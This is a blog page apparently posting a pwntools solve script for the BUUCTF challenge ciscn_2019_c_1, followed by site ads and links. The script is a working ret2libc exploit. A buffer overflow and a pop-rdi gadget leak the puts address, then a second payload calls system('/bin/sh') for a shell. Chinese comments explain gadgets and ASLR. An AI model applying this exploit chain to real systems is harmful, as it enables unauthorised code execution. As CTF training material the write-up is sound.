BUUCTF | ciscn_2019_c_1
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 | # encoding=utf-8from pwn import *from LibcSearcher import *sh = remote('node3.buuoj.cn',29416)# sh = process('./ciscn_2019_c_1')# sh = remote('node3.buuoj.cn', 28271)# ELF模块用于获取ELF文件的信息elf = ELF('./ciscn_2019_c_1')# 分析 ELF# context.log_level = 'deb3# start = 0x400B28start = elf.sym['main']# 0x400b28-->main函数的起始地址rdi_addr = 0x0000000000400c83# ROPgadget --binary ciscn_2019_c_1 | grep "pop rdi"# 64位的 函数调用时 前六个参数是通过rdi,rsi,rdx,rcx,r8 和 r9进行传递的# gadget# 字面意思为“小工具”,如果把某个程序比喻成汽车,那么gadget就相当于拆车的工具,依靠它,我们就可以“突破”程序的限制,执行我们希望执行的代码。# 找到各个函数的plt和gotputs_plt = elf.plt['puts']puts_got = elf.got['puts']gets_got = elf.got['gets']# log.success('puts_plt => {}'.format(hex(puts_plt)))# log.success('gets_got => {}'.format(hex(gets_got)))# log.success('puts_got => {}'.format(hex(puts_got)))# 知识点:# Linux的程序中使用了延迟绑定机制,也就是说一个函数在没有执行前,你是不知道它的真实地址是什么的# system 函数属于 libc,而 libc.so 动态链接库中的函数之间相对偏移是固定的。# 即使程序有 ASLR 保护,也只是针对于地址中间位进行随机,最低的 12 位并不会发生改变sh.sendlineafter('choice!\n', '1')payload1 = 'a' * 88 + p64(rdi_addr) + p64(puts_got) + p64(puts_plt) + p64(start)# s->0x50+r->0x8=0x58=88sh.sendline(payload1)gdb.attach(sh)# 在指定process之后可以attach上去调试,配合proc模块就可以得到对应进程的pid非常方便。sh.recvuntil('@')sh.recvline()puts_leak = u64(sh.recvline()[:-1].ljust(8, '\0'))# log.success('puts_leak_addr => {}'.format(hex(puts_leak)))libc = LibcSearcher('puts', puts_leak)libc_base = puts_leak - libc.dump('puts')sys_addr = libc_base + libc.dump('system')bin_sh_addr = libc_base + libc.dump('str_bin_sh')# log.success('libc_base_addr => {}'.format(hex(libc_base)))# log.success('system_addr => {}'.format(hex(sys_addr)))# log.success('bin_sh_addr => {}'.format(hex(bin_sh_addr)))sh.sendlineafter('choice!\n', '1')payload2 = 'a' * 88 + p64(rdi_addr) + p64(bin_sh_addr) + p64(sys_addr)sh.sendline(payload2)sh.interactive() |
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 从 HTTP 原因短语缺失研究 HTTP/2 和 HTTP/3 的设计差异
· AI与.NET技术实操系列:向量存储与相似性搜索在 .NET 中的实现
· 基于Microsoft.Extensions.AI核心库实现RAG应用
· Linux系列:如何用heaptrack跟踪.NET程序的非托管内存泄露
· 开发者必知的日志记录最佳实践
· TypeScript + Deepseek 打造卜卦网站:技术与玄学的结合
· Manus的开源复刻OpenManus初探
· AI 智能体引爆开源社区「GitHub 热点速览」
· C#/.NET/.NET Core技术前沿周刊 | 第 29 期(2025年3.1-3.9)
· 从HTTP原因短语缺失研究HTTP/2和HTTP/3的设计差异